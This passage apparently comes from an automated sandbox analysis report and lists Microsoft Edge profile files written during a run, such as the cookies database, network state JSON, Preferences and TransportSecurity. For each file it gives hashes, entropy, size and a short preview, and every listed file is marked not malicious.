                                                                                                                                                                  Entropy (8bit):0.40293591932113104
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                  MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                  SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                  SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                  SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2e02f3ac-01b7-4de5-acad-4fa3a6d6df53.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2ea94c59-8874-4d76-ad05-c5ffd2c03d44.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6317b696-3c01-40df-9d8d-d2a6609047cc.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\84216bd8-e58b-4795-bbc7-3f743d6ee614.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8a826de1-d553-4a5f-8c31-c69de051a510.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                  Entropy (8bit):3.788754913993502
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                  MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                  SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                  SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                  SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"sts":[],"version":2}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8ba85132-db28-4b36-923e-aea478d63b67.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):2.7698042082512506
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:te+Auf+zbvepFMDRheh6Y3S8FogMKgNLXy2ZZiDsXckO0L/ZJV8Y:tTf2SFEu6Y3bzMKragDsXcf0L/ZJVb
                                                                                                                                                                  MD5:68834EB118D6795441C5BC64BD6CFF61
                                                                                                                                                                  SHA1:C8ECA67F4090F9F0FA9EA61F63E5524058B18A08
                                                                                                                                                                  SHA-256:A9950A25AFA94DC8B2E92F16EEE750BA30E2D12568AA2C807E39A0F1462AB04D
                                                                                                                                                                  SHA-512:5301F3A34BE193708A7C2DDCCC920C026B0414EEF297C39FDE7A5893F1C3F38A751B8A6EA67D48AF75A59DD5DA7427176C860A3A5A1B3C79E651ABFF3AE9C120
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF40684.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4f057.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):1.2127408516412534
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTe:JkIEumQv8m1ccnvS6AqEtv
                                                                                                                                                                  MD5:4AD3728A8FF3FA9E431B81F92564E24C
                                                                                                                                                                  SHA1:BB8B23168C3B6DD6AAF99EB8E9A69ACA7637EEC3
                                                                                                                                                                  SHA-256:496D1426382D526217195BE46C0C315980C5206B9B70E6EB4693FC745110B5E5
                                                                                                                                                                  SHA-512:6325474F12FFBCA6A4CA87D5346D8B4DE620F0573666EFC2478871525EEB8C96DE4EEA5AB323AE1CF908B1BC40DA8155C17C06379C0E8369BCB48001E5DE7526
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3e61b.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4198f.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF40694.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a1196869-c0d9-4110-ab8e-1f40edd48622.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1388
                                                                                                                                                                  Entropy (8bit):5.288839855706019
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YXssZVMdBsI77ZFRudFGcsxuiZFGJ/NsC7Z6ma3yeebsaVZC52HObG7nby:YXsU8s01fcdsHgnsaleebsajCgHObZ
                                                                                                                                                                  MD5:F9BEE451D45B3DE2164CC237F98A257C
                                                                                                                                                                  SHA1:336207FC4FE47043691771F83028F9A4CBAB8158
                                                                                                                                                                  SHA-256:7E3851D886960115B37973B6B2914516E461BF6CE445CA1972B5D05203A7CD85
                                                                                                                                                                  SHA-512:2445C4BC7ACB4C72ACCF90AFC737ED6AE0DB0FAF24C0F43C5B53F89658168609FFA447B06C42C9BBD17F75F82E253FAEA6F78A643995BEC4E72E64F0D3DFDEAA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383267478221012","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383267480209019","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383267494223752","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380769098373858","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.6852315298663104
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                                  MD5:19F8A237057D855585E293B39C348D63
                                                                                                                                                                  SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                                  SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                                  SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF41d67.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
